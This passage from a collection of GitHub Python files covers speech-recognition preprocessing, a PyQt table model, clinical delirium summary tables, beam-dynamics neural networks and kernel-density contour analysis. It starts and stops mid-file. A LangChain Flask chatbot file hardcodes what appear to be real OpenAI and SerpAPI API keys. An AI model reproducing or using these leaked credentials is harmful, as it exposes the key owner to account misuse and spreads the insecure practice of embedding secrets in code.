if __name__ == \"__main__\":\n    \n    print(\"Creating a random tree of size 900\")\n    \n    t = Tree()\n\n    for i in range(900):\n        random_place(t)\n    succeeded = True\n\n    print(\"Now successively searching for each node out of \" + str(len(names)) + \" added to the tree...\")\n    cp = None\n    for i in names:\n        \n        a = r.randrange(300)\n        nefarious = False\n        if a < 50:\n            cp = t.findNodeByName(i + \"I am not a real name\")\n            nefarious = True\n        else:\n            cp = t.findNodeByName(i)\n\n        if cp is None and not nefarious:\n            print(\"\\tTest Failed because node \" + i + \" could not be found!\")\n            succeeded = False\n            break\n\n    t.PrintTree()\n    if succeeded:\n        print(\"\\tTest passed\")","repo_name":"tylerjohnbecker/htt-viz","sub_path":"src/htt_viz_py/find_test.py","file_name":"find_test.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"19136193337","text":"import torch\nimport torch.nn as nn\nimport torch.utils.data\nimport torchaudio\n\n\nclass TextTransform:\n    '''Maps characters to integers and vice versa'''\n    def __init__(self):\n        char_map_str = '''\n        ' 0\n        <SPACE> 1\n        a 2\n        b 3\n        c 4\n        d 5\n        e 6\n        f 7\n        g 8\n        h 9\n        i 10\n        j 11\n        k 12\n        l 13\n        m 14\n        n 15\n        o 16\n        p 17\n        q 18\n        r 19\n        s 20\n        t 21\n        u 22\n        v 23\n        w 24\n        x 25\n        y 26\n        z 27\n        '''\n        self.char_map = {}\n        self.index_map = {}\n        for line in char_map_str.strip().split('\\n'):\n            ch, index = line.split()\n            self.char_map[ch] = int(index)\n            self.index_map[int(index)] = ch\n        self.index_map[1] = ' '\n\n    def text_to_int(self, text):\n        ''' Use a character map and convert text to an integer sequence '''\n        int_sequence = []\n        for c in text:\n            if c == ' ':\n                ch = self.char_map['<SPACE>']\n            else:\n                ch = self.char_map[c]\n            int_sequence.append(ch)\n        return int_sequence\n\n    def int_to_text(self, labels):\n        ''' Use a character map and convert integer labels to a text sequence '''\n        string = []\n        for i in labels:\n            string.append(self.index_map[i])\n        # index 1 is already mapped to ' ' above, so a plain join suffices;\n        # the old .replace('', ' ') inserted a space between every character\n        return ''.join(string)\n\n
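# Round-trip illustration (doctest-style; not executed in this module):\n#\n#   >>> tt = TextTransform()\n#   >>> tt.text_to_int(\"hi there\")\n#   [9, 10, 1, 21, 9, 6, 19, 6]\n#   >>> tt.int_to_text([9, 10, 1, 21, 9, 6, 19, 6])\n#   'hi there'\n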
\n\n# TODO: Questions: Log Mel Spectrogram vs Mel Spectrogram\nclass LogMelSpectogram(nn.Module):\n    # TODO: Understand the parameters\n    def __init__(self, sample_rate=8000, n_mels=81, win_length=160, hop_length=80):\n        super(LogMelSpectogram, self).__init__()\n        self.mel_spectrogram = torchaudio.transforms.MelSpectrogram(sample_rate=sample_rate, n_mels=n_mels, win_length=win_length, hop_length=hop_length)\n\n    def forward(self, waveform):\n        mel_spectrogram = self.mel_spectrogram(waveform)\n        # Add 1e-9 to avoid taking log of zero\n        log_mel_spectrogram = torch.log(mel_spectrogram + 1e-9)\n        return log_mel_spectrogram\n\n\n\nclass PreprocessData(torch.utils.data.Dataset):\n    def __init__(self, dataset, validation_set, sample_rate=8000, n_mels=81, win_length=160, hop_length=80):\n        super(PreprocessData, self).__init__()  # super(PreprocessData).__init__() skipped Dataset.__init__\n        self.dataset = dataset\n        self.text_transform = TextTransform()\n        if validation_set:\n            self.preprocess_audio = LogMelSpectogram(sample_rate=sample_rate, n_mels=n_mels, win_length=win_length, hop_length=hop_length)\n        else:\n            # Frequency/time masking (SpecAugment) is a training-time augmentation,\n            # which is why the validation set gets the bare log-mel transform above.\n            self.preprocess_audio = nn.Sequential(\n                LogMelSpectogram(sample_rate=sample_rate, n_mels=n_mels, win_length=win_length, hop_length=hop_length),\n                torchaudio.transforms.FrequencyMasking(freq_mask_param=15),\n                torchaudio.transforms.TimeMasking(time_mask_param=35)\n            )\n\n    def __getitem__(self, index):\n        # waveform, sample_rate, label, speaker_id, chapter_id, utterance_id\n        waveform, _, label, _, _, _ = self.dataset[index]\n\n        # Convert waveform to log mel spectrogram\n        log_mel_spectrogram = self.preprocess_audio(waveform)\n        # Get the length of the log mel spectrogram\n        log_mel_spectrogram_len = log_mel_spectrogram.shape[0] // 2 # TODO: Why divide by 2?\n\n        # Convert label text to integer sequence\n        label_in_int = torch.tensor(self.text_transform.text_to_int(label.lower()))\n        # Get the length of the label\n        label_len = torch.tensor(len(label_in_int))\n\n        return log_mel_spectrogram, label_in_int, log_mel_spectrogram_len, label_len\n\n    def __len__(self):\n        return len(self.dataset)\n","repo_name":"Smit6/speech-recognition","sub_path":"data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"34666561265","text":"from flask import Flask, render_template, request\r\nimport os\r\nfrom langchain.llms import OpenAI\r\nfrom langchain.agents import load_tools, initialize_agent\r\n\r\napp = Flask(__name__)\r\n\r\n# Initialize OpenAI API key\r\nos.environ[\"OPENAI_API_KEY\"] = \"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\"\r\nos.environ[\"SERPAPI_API_KEY\"] = \"58e8fec7ef2550920e610f044a933a58a834fc4ea1713773ffcb59a3d101bbef\"\r\n\r\n# Initialize LLM\r\nllm = OpenAI(temperature=0.9)\r\n\r\n# Load tools\r\ntools = load_tools([\"serpapi\", \"llm-math\"], llm=llm)\r\n\r\n# Initialize agent\r\nagent = initialize_agent(tools, llm, agent=\"zero-shot-react-description\", verbose=True)\r\n\r\n@app.route('/')\r\ndef index():\r\n    return render_template('index.html')\r\n\r\n@app.route('/chat', methods=['POST'])\r\ndef chat():\r\n    user_input = request.form['user_input']\r\n    if user_input.lower() in ['exit', 'quit']:\r\n        return \"Chatbot: Goodbye!\"\r\n    response = agent.run(user_input)\r\n    return \"Chatbot: \" + response\r\n\r\nif __name__ == '__main__':\r\n    app.run(debug=True)\r\n","repo_name":"shamsdigital/Chatbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"71495362083","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\nimport time, copy, os, sys\nimport numpy as np\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport matlab.engine\n\nfrom models import MLP, HNN, DHNN\nfrom train import train\nfrom data_maker import make_dataset\nfrom utils import matlab_interface, ObjectView, normalize, standardize, integrate_model\nmatlab_eng = matlab_interface()\n\n# plots are shown in the plot pane:\nfrom IPython import get_ipython\nipython = get_ipython()\n\nparent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(parent_dir)\nif sys.platform.startswith('win'):  # sys.platform is 'win32' on Windows, never 'windows'\n    bar = '\\\\'\nelse:\n    bar = '/'\n\n#%% Model parameters and dataset creation:\ndef model_args(as_dict=False):\n    model_dict = {'matlab_engine': matlab_eng,\n                  'model': 'FOM',\n                  'DoF': {'OutBend'},\n                  'gravity': 'GravityOn',\n                  'beam_data': 'beam_data_test.xlsx',\n                  'disp_progress': 'False',\n                  'tspan': [0,10],\n                  'timestep': 0.01,\n                  'p0span': [0,0],\n                  'q0span': [-np.pi/9,np.pi/9],\n                  'train_split': 0.7,\n                  'normalize': False,\n                  'norm_range': [0,1],\n                  'standardize': False}\n    return model_dict if as_dict else ObjectView(model_dict)\n\n# Dataset:\nmodel_param = model_args()\ndata_raw = make_dataset(model_param, samples=50, train_split=0.5)\nn_DoF, M, I, K, C = data_raw['n_DoF'], data_raw['M'], data_raw['I'], data_raw['K'], data_raw['C']\n\n#%% Preprocessing:\nif model_param.normalize:\n    data = normalize(copy.deepcopy(data_raw), model_param.norm_range)\nelif 
model_param.standardize:\n    data = standardize(copy.deepcopy(data_raw))\nelse:\n    data = copy.deepcopy(data_raw)\n\n# Train/test split:\nsplit_ix = int(len(data['x'])*model_param.train_split)\nsplit_data = {}\nfor k in ['x', 'dx','t']:\n    split_data[k], split_data[k + '_test'] = data[k][:split_ix], data[k][split_ix:]\ndata = split_data\n\n#%% Train NN model:\n# NOTE: the original `if 'dhnn_model' and 'mlp_model' and 'hnn_model' in locals():`\n# only tested the last name; non-empty string literals are always truthy.\nif all(name in locals() for name in ('dhnn_model', 'mlp_model', 'hnn_model')):\n    del dhnn_model, mlp_model, hnn_model\n    \ndef train_args(as_dict=False):\n    train_dict = {'input_dim': 2*n_DoF+1,\n                  'hidden_dim': 50,    # capacity\n                  'output_dim': 2*n_DoF,\n                  'learning_rate': 1e-3, \n                  'test_every': 1,\n                  'print_every': 200,\n                  'batch_size': 1001,\n                  'total_steps': 10000, # because we have a synthetic dataset\n                  'device': 'cpu', # {\"cpu\", \"cuda\"} for using GPUs\n                  'seed': 0,\n                  'as_separate': False,\n                  'decay': 0}\n    return train_dict if as_dict else ObjectView(train_dict)\n\nargs = train_args()\nmlp_model = MLP(args.input_dim, args.output_dim, args.hidden_dim)\nmlp_results = train(mlp_model, args, data)\n\n# hnn_model = HNN(args.input_dim, args.hidden_dim)\n# hnn_results = train(hnn_model, args, data)\n\ndhnn_model = DHNN(args.input_dim, args.hidden_dim)\ndhnn_results = train(dhnn_model, args, data)\n\n#%% Test simulation model:\nprint('\rRunning test simulations... {:.1f}% done'.format(0), end='')\n\n# Test Parameters:\ntspan = [0,15]\ndt = 0.01\ntvec = np.array(np.linspace(tspan[0],tspan[1],int((tspan[1]-tspan[0])/dt)+1))\nkwargs = {'t_eval': tvec, 'rtol': 1e-10}\np0span = model_param.p0span\nq0span = model_param.q0span\nn_test = 1\n\ntsim_mlp, tsim_dhnn, tsim_true, t_mlp_true, t_dhnn_true = [], [], [], [], []\nfor i in range(n_test):\n    p0_test = 0*((p0span[1]-p0span[0])*np.random.rand(n_DoF) + p0span[0] )\n    q0_test = 0*((q0span[1]-q0span[0])*np.random.rand(n_DoF) + q0span[0])\n    X0_test_raw = np.concatenate([p0_test,q0_test])\n\n    if model_param.normalize:\n        norm_range = model_param.norm_range\n        p0_test = np.ptp(norm_range)*(p0_test - np.min(data_raw['x'][:,:n_DoF]))/np.ptp(data_raw['x'][:,:n_DoF]) + norm_range[0] \n        q0_test = np.ptp(norm_range)*(q0_test - np.min(data_raw['x'][:,n_DoF:]))/np.ptp(data_raw['x'][:,n_DoF:]) + norm_range[0]\n        X0_test = np.concatenate([p0_test,q0_test])\n    elif model_param.standardize:\n        p0_test = (p0_test - np.mean(data_raw['x'][:,:n_DoF]))/np.std(data_raw['x'][:,:n_DoF]) \n        q0_test = (q0_test - np.mean(data_raw['x'][:,n_DoF:]))/np.std(data_raw['x'][:,n_DoF:])\n        X0_test = np.concatenate([p0_test,q0_test])\n    else:\n        X0_test = X0_test_raw \n\n    # Run MLP model simulation for the test case\n    t = time.time()\n    X_mlp = integrate_model(mlp_model, tspan, X0_test, n_DoF, **kwargs) # MLP NN model simulation\n    tsim_mlp.append(time.time() - t)\n\n    # Run DHNN model simulation for the test case\n    t = time.time()\n    X_dhnn = integrate_model(dhnn_model, tspan, X0_test, n_DoF, **kwargs) # DHNN model simulation\n    tsim_dhnn.append(time.time() - t)\n    \n    # Run MATLAB simulation for the test case:\n    t = time.time()\n    X_true = matlab_eng.simulation(model_param.model,model_param.DoF,model_param.gravity,\n                                   matlab.double(tvec),matlab.double(X0_test_raw),\n                                   model_param.disp_progress,nargout=2)[0]\n    tsim_true.append(time.time() - t)\n    \n    t_mlp_true.append((tsim_mlp[i]/tsim_true[i])*100)\n    t_dhnn_true.append((tsim_dhnn[i]/tsim_true[i])*100)\n    \n    progress_msg = '\rRunning test simulations... 
{:.1f}% done'.format(100*(i+1)/n_test)\n print(progress_msg + '\\n' if i == n_test-1 else progress_msg, end='')\n \n# Denormalize results (if needed):\nif model_param.normalize:\n X_mlp_norm = X_mlp['y'].T\n p_mlp = (X_mlp_norm[:,:n_DoF] - norm_range[0])*np.ptp(data_raw['x'][:,:n_DoF])/np.ptp(norm_range) + np.min(data_raw['x'][:,:n_DoF])\n q_mlp = (X_mlp_norm[:,n_DoF:] - norm_range[0])*np.ptp(data_raw['x'][:,n_DoF:])/np.ptp(norm_range) + np.min(data_raw['x'][:,n_DoF:])\n X_MLP = np.array(np.concatenate([p_mlp.T,q_mlp.T])).T\n X_dhnn_norm = X_dhnn['y'].T\n p_dhnn = (X_dhnn_norm[:,:n_DoF] - norm_range[0])*np.ptp(data_raw['x'][:,:n_DoF])/np.ptp(norm_range) + np.min(data_raw['x'][:,:n_DoF])\n q_dhnn = (X_dhnn_norm[:,n_DoF:] - norm_range[0])*np.ptp(data_raw['x'][:,n_DoF:])/np.ptp(norm_range) + np.min(data_raw['x'][:,n_DoF:])\n X_DHNN = np.array(np.concatenate([p_dhnn.T,q_dhnn.T])).T\nelif model_param.standardize:\n X_mlp_std = X_mlp['y'].T\n p_mlp = X_mlp_std[:,:n_DoF]*np.std(data_raw['x'][:,:n_DoF]) + np.mean(data_raw['x'][:,:n_DoF])\n q_mlp = X_mlp_std[:,n_DoF:]*np.std(data_raw['x'][:,n_DoF:]) + np.mean(data_raw['x'][:,n_DoF:])\n X_MLP = np.array(np.concatenate([p_mlp.T,q_mlp.T])).T\n X_dhnn_std = X_dhnn['y'].T\n p_dhnn = X_dhnn_std[:,:n_DoF]*np.std(data_raw['x'][:,:n_DoF]) + np.mean(data_raw['x'][:,:n_DoF])\n q_dhnn = X_dhnn_std[:,n_DoF:]*np.std(data_raw['x'][:,n_DoF:]) + np.mean(data_raw['x'][:,n_DoF:])\n X_DHNN = np.array(np.concatenate([p_dhnn.T,q_dhnn.T])).T\nelse:\n X_MLP = X_mlp['y'].T\n X_DHNN = X_dhnn['y'].T\n\nX_true = np.array(X_true)\n\n# Save NN simulation results:\nsio.savemat(parent_dir + bar + \"SimulationFramework\" + bar + \"test_results\" + bar + \"test.mat\", {'X_FOM': X_true, 'X_MLP': X_MLP, 'X_DHNN': X_DHNN, 'tvec': matlab.double(tvec)})\n\n# NN relative computaional cost:\nprint('\\nComputational cost relative to MATLAB simulation:\\nMLP: {:.1f}% +/- {:.2f}% \\nDHNN: {:.1f}% +/- {:.2f}%'.format(np.mean(t_mlp_true),np.std(t_mlp_true),np.mean(t_dhnn_true),np.std(t_dhnn_true)))\n\n\n#%% Phase portrait for last test run:\nipython.magic('matplotlib inline')\ndof = 0 # DoF considered for the phase portrait \np_mlp, q_mlp = np.split(X_MLP, 2, axis=1)\np_dhnn, q_dhnn = np.split(X_DHNN, 2, axis=1)\np_true, q_true = np.split(X_true, 2, axis=1)\n\nfig = plt.figure()\nplt.plot(q_true[:,dof],p_true[:,dof],'k', q_mlp[:,dof],p_mlp[:,dof],'--b', q_dhnn[:,dof],p_dhnn[:,dof],'--r')\nplt.xlabel('q [rad]')\nplt.ylabel('p [kg*rad/s]')\nplt.grid(True)\nplt.legend(['Ground Truth','MLP','DHNN'],loc='upper right')\nplt.show()\n\n\n\n\n#y0 = np.array([0.0,0.0,0.0,0.0,0.0,0.0]) \n# p0 = np.asarray([0])\n# q0 = np.asarray([0])\n# p0 = (p0 - np.min(data_raw['x'][:,:n_DoF]))/np.ptp(data_raw['x'][:,:n_DoF])\n# # q0 = (q0 - np.min(data_raw['x'][:,n_DoF:]))/np.ptp(data_raw['x'][:,n_DoF:])\n# y0 = np.array(np.concatenate([p0,q0])).T\n\n# p_real = (x_sol[:,:n_DoF])*np.ptp(data_raw['x'][:,:n_DoF]) + np.min(data_raw['x'][:,:n_DoF])\n# q_real = (x_sol[:,n_DoF:])*np.ptp(data_raw['x'][:,n_DoF:]) + np.min(data_raw['x'][:,n_DoF:])\n# q_real = (x_sol[:,n_DoF:])\n# xs_sol = np.concatenate((p_real,q_real),axis=1)","repo_name":"borgessv/MultibodyNonlinearBeams","sub_path":"MLP/MAIN.py","file_name":"MAIN.py","file_ext":"py","file_size_in_byte":8419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33003240170","text":"\n# --- loading libraries -------------------------------------------------------\nimport pandas as pd\nimport numpy as np\n# 
------------------------------------------------------ loading libraries ----\n\n\n# --- main routine ------------------------------------------------------------\nfiles = [\n 'master_train.pickle',\n 'master_validation.pickle',\n 'master_calibration.pickle',\n 'master_test.pickle'\n]\n\nPATH = '/project/M-ABeICU176709/delirium/data/inputs/master/'\n\ndf = pd.DataFrame()\n\nfor f in files:\n print(f)\n temp = pd.read_pickle(PATH+f, compression='zip')\n\n cols = [\n 'ADMISSION_ID', 'PATIENT_ID',\n 'AGE', 'GENDER_M', 'GENDER_F', 'TYPE_EMERG',\n 'TYPE_NON-S', 'TYPE_ELECT', 'CLASS_TRAUM', 'CLASS_SURGI', 'CLASS_MEDIC',\n 'CLASS_NEURO', 'I105', 'I110', 'I116', 'I118_nc01', 'I177_nc01',\n 'I263_nc01', 'I357_nc01', 'delirium_12h', 'delirium_24h']\n \n temp = temp[cols]\n\n temp.rename(columns={\n 'I105' : 'SOFA',\n 'I110' : 'APACHE2',\n 'I116' : 'APACHE3',\n 'I118_nc01' : 'CRRT',\n 'I177_nc01' : 'IHD',\n 'I263_nc01' : 'IV',\n 'I357_nc01' : 'NIV'},\n inplace=True)\n\n df = pd.concat([df, temp], axis=0, ignore_index=True)\n\ncombined = df.groupby('ADMISSION_ID').mean().reset_index()\ntemp = combined.describe()\ntemp.loc['sum',:] = combined.sum()\ntemp.reset_index(inplace=True)\ntemp.to_pickle('/project/M-ABeICU176709/delirium/data/outputs/results/table_1_general.pickle')\n\n# part II - delirium and LOS\nADMISSION = pd.read_pickle('/project/M-ABeICU176709/ABeICU/data/ADMISSIONS.pickle', compression = 'zip')\nadmission_ids = list(df['ADMISSION_ID'].unique())\ndf = ADMISSION.loc[ADMISSION['ADMISSION_ID'].isin(admission_ids)].reset_index(drop=True)\ndf = df[['ADMISSION_ID', 'ICU_ADMIT_DATETIME', 'ICU_DISCH_DATETIME', 'DELIRIUM_FLAG']]\ndf['delta'] = df.apply(lambda x: (x['ICU_DISCH_DATETIME'] - x['ICU_ADMIT_DATETIME']).total_seconds() / 86400, axis=1)\n\ndf = df.groupby('ADMISSION_ID').mean().reset_index()\ntemp = df.describe()\ntemp.loc['sum',:] = df.sum()\ntemp.reset_index(inplace=True)\n\ntemp.to_pickle('/project/M-ABeICU176709/delirium/data/outputs/results/table_1_p2_general.pickle')\n\n\n\n\n\n# ------------------------------------------------------------ main routine ---\n","repo_name":"data-intelligence-for-health-lab/delirium_prediction","sub_path":"code/results/03_table_general.py","file_name":"03_table_general.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37112360371","text":"from PyQt5.QtCore import QAbstractTableModel, Qt, QSize\nfrom datetime import datetime\n\nclass TableModel(QAbstractTableModel):\n def __init__(self, data, headers=None, parent=None) -> None:\n super().__init__(parent)\n self._data = data\n self._headers = headers\n\n def data(self, index, role):\n if role == Qt.DisplayRole:\n # See below for the nested-list data structure.\n # .row() indexes into the outer list,\n # .column() indexes into the sub-list\n value = self._data[index.row()][index.column()]\n if isinstance(value, datetime):\n return value.isoformat()\n\n if isinstance(value, list):\n return str(value)\n \n return value\n\n def rowCount(self, index=None):\n # The length of the outer list.\n return len(self._data)\n\n def columnCount(self, index=None):\n # The following takes the first sub-list, and returns\n # the length (only works if all rows are an equal length)\n if not self._headers is None:\n return len(self._headers)\n \n if len(self._data) > 0:\n return len(self._data[0])\n \n return 0\n\n def headerData(self, section: int, orientation: Qt.Orientation, role: int=Qt.DisplayRole):\n if orientation 
== Qt.Horizontal:\n if not self._headers is None:\n if len(self._headers) > section:\n head = self._headers[section]\n\n if isinstance(head, dict):\n if role == Qt.DisplayRole:\n return head.get(\"text\")\n if role == Qt.SizeHintRole:\n if \"width\" in head:\n return head.get(\"width\")\n\n else:\n if role == Qt.DisplayRole:\n return str(head)\n if role == Qt.SizeHintRole:\n return QSize(400, 30)\n\n return str(section + 1)\n\n if orientation == Qt.Vertical:\n if role == Qt.DisplayRole:\n return str(section + 1)\n \n return super().headerData(section, orientation, role)","repo_name":"giesekow/dcomex-tools","sub_path":"dcomex/lib/qtdata.py","file_name":"qtdata.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73747932321","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 24 10:52:35 2019\n\n - Relative Risk v2\n \n - without evaluation functions so it's easier to debug\n \n - Need to run FishersLinearDiscriminant to get the normal and faulty data\n \n \n \n - \n\n@author: thomasdrayton\n\"\"\"\n\n\n\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KernelDensity\nfrom sklearn.model_selection import StratifiedKFold\nfrom matplotlib import cm\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import KFold\nimport matplotlib.path as mpltPath\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.lines import Line2D\nimport itertools\nfrom operator import itemgetter\nimport scipy.stats as st\nfrom scipy import interp\nfrom sklearn.metrics import auc\nfrom matplotlib import animation\n\n#%%\n\n# Functions -----------------------------------------------------------------\n\n\ndef findKDEbandwidth(bandwidths , fitting_data, class_type):\n '''\n Bandwidth hyperparameter gridsearch so that the probability density \n function fits the data well. Uses 5 fold cross validation.\n \n Bandwidths is the array of values to try i.e. 
np.linspace()\n    \n    class_type is a string: either 'Faulty' or 'Normal'\n    '''\n    gridS = GridSearchCV(KernelDensity(kernel='gaussian'),\n                        {'bandwidth': bandwidths},\n                        cv=KFold(5),\n                        iid=False,\n                        n_jobs=-1)\n    gridS.fit(fitting_data)\n    \n    print(class_type,': ',gridS.best_params_)\n    return gridS\n    \n\n\n\n\ndef kde2D(x, y, bandwidth, x_mesh=[0,1,100j],y_mesh=[0,1,100j], **kwargs): \n    \"\"\"\n    Build 2D kernel density estimate (KDE).\n    https://tinyurl.com/y6goqsve\n    \"\"\"\n\n    # create grid of sample locations (default: 100x100)\n    xx, yy = np.mgrid[x_mesh[0]:x_mesh[1]:x_mesh[2], \n                      y_mesh[0]:y_mesh[1]:y_mesh[2]] # 100j => 100 points linearly spaced [number of bins]\n\n    xy_sample = np.vstack([yy.ravel(), xx.ravel()]).T\n    xy_train = np.vstack([y, x]).T\n\n    # Instantiate kernel\n    kde_skl = KernelDensity(bandwidth=bandwidth, **kwargs)\n    kde_skl.fit(xy_train)\n\n    # score_samples() returns the log-likelihood of the samples\n    z = np.exp(kde_skl.score_samples(xy_sample))\n    #z = kde_skl.score_samples(xy_sample)\n    \n    #positions = np.vstack([xx.ravel(), yy.ravel()])\n    #values = np.vstack([x, y])\n    #kernel = st.gaussian_kde(values)\n    #z = np.reshape(kernel(positions).T, xx.shape)\n    \n    return xx, yy, np.reshape(z, xx.shape)\n\n    \n\n\n\n\ndef levelKDE(surface):\n    '''\n    Clamp the KDE surface from below: anything smaller than 10^(-5) is set to 10^(-5).\n    \n    surface is zz_f or zz_n from kde2D\n    '''\n    for i,vals in enumerate(surface):\n        for ii,val in enumerate(vals):\n            if(val <= 10**(-5)):\n                surface[i][ii] = 10**(-5)\n    return surface\n\n\n\ndef encapsulatingContours(set_of_contours,level):\n    '''\n    set_of_contours = contSet[lvl], where contSet stores the contours for every\n                      level and each lvl holds that level's group of contours\n    level = lvl \n    \n    Returns the pairs of contour indices where one contour lies inside the other.\n    '''\n    cont_num = range(len(set_of_contours[level])) # number of contours\n    conts_inside = [] # pairs of contours that lie within each other\n    for c in itertools.combinations(cont_num,2):\n        # check if contours are inside each other\n        contour1 = set_of_contours[level][c[0]]\n        contour2 = set_of_contours[level][c[1]]\n        #print(c)\n        path1 = mpltPath.Path(contour1)\n        path2 = mpltPath.Path(contour2)\n        \n        if(path1.contains_path(path2)):\n            # path2 is inside path1\n            conts_inside.append(c)\n            \n        elif(path2.contains_path(path1)):\n            # path1 is inside path2\n            conts_inside.append(c)\n    return conts_inside \n\n\n\n\ndef contourPlot(xx,yy,surface,fold_count,data_name,data1=None,data2=None):\n    '''\n    Filled contour plot of the given surface, optionally overlaying the data\n    used to create the KDE. data_name is a string describing that data.\n    '''\n    fig,ax = plt.subplots(1,1)\n    cf = ax.contourf(xx,yy,surface,levels=15,cmap=cm.plasma)\n    if data1 is not None and data2 is not None:  # data1.all()!=None raised AttributeError whenever data1 was None\n        ax.scatter(data1[:,0], data1[:,1], marker = 'x', s=70,c='r',linewidth=0.7)\n        ax.scatter(data2[:,0], data2[:,1], marker = 'o', s=20,edgecolor='white',linewidth=0.7,facecolor='None')\n    fig.colorbar(cf)\n    ax.set_title(\"Faulty/Normal Log-likelihood: Fold {0}\".format(fold_count+1))\n    \n    \n#contourPlot(xx,yy,log_rr,fold_count,'',data1=f_X_train,data2=n_X_train) \n\n    # make it so that all plots are shown in a single figure\n\n\ndef surfacePlot(xx,yy,surface,fold_count):\n    \n    fig = plt.figure()\n    ax = fig.add_subplot(111, projection='3d')\n    #fig,ax = plt.subplots(1,1,subplot_kw={'projection':'3d'})\n    cb = ax.plot_surface(xx,yy,surface,antialiased=False,\n                          cmap=cm.plasma,\n                          alpha=1)\n    ax.set_title(\"Faulty/Normal Log-likelihood: Fold {0}\".format(fold_count+1))\n    #fig.colorbar(cb)\n    \n    for angle in np.linspace(0, 360,600):\n        ax.view_init(30, angle)\n        #plt.draw()\n        plt.pause(.0001)\n
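\n# Minimal usage sketch for the KDE helpers above (illustrative values; assumes\n# pts is an Nx2 array of points in the subspace):\n#\n#   xx, yy, zz = kde2D(pts[:, 0], pts[:, 1], bandwidth=0.02,\n#                      x_mesh=[-0.5, 0.2, 200j], y_mesh=[-0.5, 0.1, 200j])\n#   zz = levelKDE(zz)                 # clamp the floor at 1e-5 before taking logs\n#   contourPlot(xx, yy, np.log(zz), 0, '')\n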
\n\n\n\n    \n    \n#%%\n\n\ndef plotDB( p, n, f, l,pause_time=5):\n    '''\n    This gives the actual results for each contour that is plotted.\n    Use it to verify that your automated results are correct.\n    \n    - p is the Nx2 array containing the coordinates of the contour to plot\n        p = contSet[lvl][contour]\n    \n    - n is the normal data\n    \n    - f is the faulty data\n    \n    - if l == '+' positive levels, l=='-' => negative levels\n    '''\n    \n    \n    for i in p:\n        \n        # create paths ------------------------------------------------\n        path = mpltPath.Path(i)\n        \n        n_in = path.contains_points(n)\n        f_in = path.contains_points(f)\n        \n        # assign points ------------------------------------------------\n        \n        if(l=='+'):\n            tn_fn_colors = []\n            for point in f_in: # for each faulty point that's inside contour\n                if(point==True): # if faulty point is inside contour\n                    tn_fn_colors.append('red') # give it colour RED (TN)\n                else: # if faulty point is outside contour\n                    tn_fn_colors.append('blue') # FP (because region outside contour is positive/normal)\n            \n            tp_fp_colours = []\n            for point in n_in: # for each normal point that's inside contour\n                if(point==True): # if normal point is inside contour\n                    tp_fp_colours.append('orange') # normal point inside is FN\n                else: # if normal point is outside contour \n                    tp_fp_colours.append('purple') # normal points outside is TP\n            print('TN: ',np.sum(f_in))\n            print('FN: ',np.sum(n_in))\n            print()\n        \n        # for negative regions where contours define normal \n        if(l=='-'):\n            tn_fn_colors = [] \n            for point in f_in: # for each faulty point that's inside contour\n                if(point==True):\n                    tn_fn_colors.append('red') # faulty point in contour is FP\n                else:\n                    tn_fn_colors.append('blue') # faulty point outside contour is TN\n            \n            tp_fp_colours = []\n            for point in n_in:\n                if(point==True):\n                    tp_fp_colours.append('orange') # normal point inside is TP\n                else:\n                    tp_fp_colours.append('purple') # normal points outside is FN\n            print('FP: ',np.sum(f_in))\n            print('TP: ',np.sum(n_in))\n            print()\n        \n        # plot DB -------------------------------------------------------\n        plt.plot(i[:,0],i[:,1],c='k') # path\n        \n        plt.scatter(f[:,0],f[:,1],marker='x',s=50,color=tn_fn_colors) # faulty points\n        plt.scatter(n[:,0],n[:,1],marker='^',s=30,facecolor=None,edgecolors=tp_fp_colours) # normal points\n        \n        \n        \n        \n        plt.show()\n        plt.pause(pause_time)\n\n    \n\n\ndef pointInOrOut(data,set_of_contours,level_idx,in_colour,out_colour):\n    '''\n    Given data points and a contour set with an associated level,\n    \n    returns a list with one colour per data point: in_colour if the point is\n    enclosed by a contour (and not inside a nested inner contour), out_colour\n    otherwise.\n    \n    data is np.array [Nx2]\n    \n    '''\n    inside = []\n    for i in data: # for each point in the data\n        \n        flag = 0\n        \n        conts_inside = encapsulatingContours(set_of_contours,level_idx)\n        \n        # ----------------------------------------------------\n        # get boolean array for contours that contain the point\n        \n        # contours that point is within\n        inside_lst = []\n        \n        # for each point, check if it is inside any of the contours\n        for contour_coords in set_of_contours[level_idx]:\n            \n            path = mpltPath.Path(contour_coords)\n            \n            # check whether in or out of current contour\n            f_in = path.contains_point(i)\n            \n            # add f_in result to list for comparison later\n            if(f_in==True):\n                inside_lst.append(in_colour)\n            else:\n                inside_lst.append(out_colour)\n            \n            #inside_lst.append(f_in)\n            \n        # ----------------------------------------------------\n        \n        # ---------------------------------------------------- \n        \n        # if f_in_lst is all False => not in a contour\n        if(all(i == 
